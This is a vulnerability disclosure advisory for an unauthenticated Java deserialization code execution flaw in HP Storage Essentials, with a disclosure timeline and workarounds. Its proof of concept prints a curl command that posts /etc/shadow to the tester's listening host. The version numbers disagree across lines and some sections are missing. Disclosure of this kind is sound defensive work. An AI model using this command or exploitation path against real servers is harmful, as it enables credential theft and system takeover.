1. Vulnerability Properties
Title: HP Storage Essentials Remote Code Execution via Java deserialization
CVE ID: CVE-2017-10992
CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Vendor: HP (www.hp.com)
Products: HP Storage Essentials 22.214.171.124 (possibly others)
Advisory Release Date: 19 September 2017
Advisory URL: https://labs.integrity.pt/advisories/cve-2017-10992
Credits: Discovery by Filipe Bernardo <fb[at]integrity.pt>
2. Vulnerability Summary
The HP Storage Essentials version 126.96.36.199, is vulnerable to an unauthenticated Remote Code Execution via Java deserialization when a user sends a Java serialized request to the service endpoint at: /invoker/JMXInvokerServlet.
3. Technical Details
The HP Storage Essentials exposes a Java web server at http://[vulnerable_host]/servlet.html, presenting a login form that is used for product administration.
Exploiting the vulnerability
An unauthenticated attacker can send Java serialized payload to the Java server endpoint at http://[vulnerable_host]/invoker/JMXInvokerServlet (which is a JBoss server) and achieve code execution. To achieve remote code execution as a proof of concept, we used the Burp extension “Java SerialKiller” to create a serialized request of the following command:
curl –X post –d @/etc/shadow http://
The vulnerable server connected to the tester’s machine, which had a netcat session listening on port 8888, and sending the /etc/shadow file as the POST body, confirming the execution of an arbitrary command with root privileges:
connect to [x.x.x.x] from (UNKNOWN) [y.y.y.y] 33098
post / HTTP/1.1
4. Vulnerable Versions
- HP Storage Essentials version 188.8.131.52 (possibly others)
- HP team answered our mails saying that this version will not get updates so no solution is available. See “6. Workarounds”.
- Ensure all accesses to the management page are controlled by an access list.
- Contact HP for support.
7. Vulnerability Timeline
- 18/May/2017 - Vendor contacted, reported vulnerability
- 23/May/2017 - Vendor answered email, internal ticket PSRT110461
- 29/May/2017 - Pinged vendor for details; Answered that information was provided to internal product engineering
- 19/Jun/2017 - Pinged vendor for details; Answered that the product team are still analyzing
- 07/Jul/2017 - Vendor answered saying that this product is no longer supported, product team will not be remediating this issue
- 07/Jul/2017 - Mailed Mitre asking for CVE id, Mitre assigned id CVE-2017-10992
- 19/Sep/2017 - Vulnerability Advisory published